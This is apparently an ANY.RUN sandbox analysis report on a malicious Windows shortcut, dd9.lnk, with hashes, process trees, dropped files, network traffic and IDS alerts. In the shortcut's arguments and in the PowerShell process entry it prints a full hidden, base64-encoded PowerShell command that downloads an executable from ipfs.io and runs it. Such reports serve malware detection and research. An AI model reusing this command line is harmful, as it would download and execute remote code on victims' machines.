File name:

dd9.lnk

Full analysis: https://app.any.run/tasks/3be5ebd3-1b38-4160-b863-77e880f358a8
Verdict: Malicious activity
Analysis date: September 03, 2025, 17:52:01
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
ipfs
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Unicoded, HasExpIcon, Archive, ctime=Wed Apr 6 03:56:26 2016, atime=Wed Apr 6 03:56:26 2016, mtime=Wed Apr 6 03:56:26 2016, length=444928, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MD5:

DAEF460BD5DBE67A3CC52CEB6B1A78CD

SHA1:

F69E0E8B518558F485051D613372F656AFEF0F90

SHA256:

F943B90FE47517E9310418072B0C491A30AEDDED685FF4D67E94C612B8C9B4B7

SSDEEP:

24:8W0xJLCRgCn6RwvKiI8W2ALOW5+/CWmWiPMov3A/ZJPyX1Bfuwq+ZFAUl1c004Qj:8W8MN6Y8tao/A3gm8ZFAUl/b6iLMOq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes powershell commands (LNK)

      • powershell.exe (PID: 6948)
    • PowerShell executes remote file download (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6948)
  • SUSPICIOUS

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 6948)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 6948)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6948)
    • Checks proxy server information

      • powershell.exe (PID: 6948)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 6948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: Archive
CreateDate: 2016:04:06 03:56:26+00:00
AccessDate: 2016:04:06 03:56:26+00:00
ModifyDate: 2016:04:06 03:56:26+00:00
TargetFileSize: 444928
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: D6BC-4685
VolumeLabel: -
LocalBasePath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
RelativePath: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9pcGZzLmlvL2lwZnMvUW1kTWdzR2ZUb1BSRVhlWFF5UU1od210OU52REdFdlRSdjJCUGZ0eEdIY0pLdj9maWxlbmFtZT1tYUlzRW5OQnNhM3J4Qk8uZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));
IconFileName: C:\Users\D.E.L.L\Desktop\lnk builder\Icons\gtdtyufhh.ico
MachineID: dell
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2508C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2976\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6948"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9pcGZzLmlvL2lwZnMvUW1kTWdzR2ZUb1BSRVhlWFF5UU1od210OU52REdFdlRSdjJCUGZ0eEdIY0pLdj9maWxlbmFtZT1tYUlzRW5OQnNhM3J4Qk8uZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
5 870
Read events
5 870
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
6948powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:1BD92C8F384A0812C212EF0348D78092
SHA256:FD6E7FEC5622415E7B663DDDE0A886ACBFB61AED1CA3DE5B537A013BE6490CD7
6948powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2P93A9VBVRRN1ZEPZ3AM.tempbinary
MD5:8096D966EFCF84438D257A2F0EB0CDB3
SHA256:66EB8BDF35D1A255C88FCD09B56695A57DB7DC30084A097AE194168BD683C266
6948powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ujchrifq.tvu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6948powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cw25hwqc.pfl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6948powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\92d3ec088c8e101d.customDestinations-msbinary
MD5:8096D966EFCF84438D257A2F0EB0CDB3
SHA256:66EB8BDF35D1A255C88FCD09B56695A57DB7DC30084A097AE194168BD683C266
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
22
DNS requests
16
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.216.77.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
1268
svchost.exe
GET
200
104.79.89.142:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
DE
binary
814 b
whitelisted
1508
SIHClient.exe
GET
200
104.79.89.142:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
DE
binary
407 b
whitelisted
1508
SIHClient.exe
GET
200
104.79.89.142:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
DE
binary
419 b
whitelisted
6212
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
6948
powershell.exe
GET
301
209.94.90.1:80
http://ipfs.io/ipfs/QmdMgsGfToPREXeXQyQMhwmt9NvDGEvTRv2BPftxGHcJKv?filename=maIsEnNBsa3rxBO.exe
US
html
167 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4836
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
6948
powershell.exe
209.94.90.1:80
ipfs.io
PROTOCOL
US
whitelisted
6948
powershell.exe
209.94.90.1:443
ipfs.io
PROTOCOL
US
whitelisted
6212
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6212
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.110
whitelisted
ipfs.io
  • 209.94.90.1
whitelisted
login.live.com
  • 40.126.31.67
  • 40.126.31.2
  • 20.190.159.73
  • 40.126.31.0
  • 20.190.159.64
  • 40.126.31.130
  • 40.126.31.131
  • 40.126.31.3
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
crl.microsoft.com
  • 23.216.77.42
  • 23.216.77.28
whitelisted
www.microsoft.com
  • 104.79.89.142
whitelisted
slscr.update.microsoft.com
  • 20.165.94.63
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
self.events.data.microsoft.com
  • 52.182.143.214
whitelisted

Threats

PID
Process
Class
Message
2200
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING Peer-to-Peer File Sharing Service Domain in DNS Lookup (ipfs .io)
6948
powershell.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] InterPlanetary File System IPFS Service
6948
powershell.exe
Potentially Bad Traffic
ET FILE_SHARING Observed Peer-to-Peer File Sharing Service Domain (ipfs .io in TLS SNI)
No debug info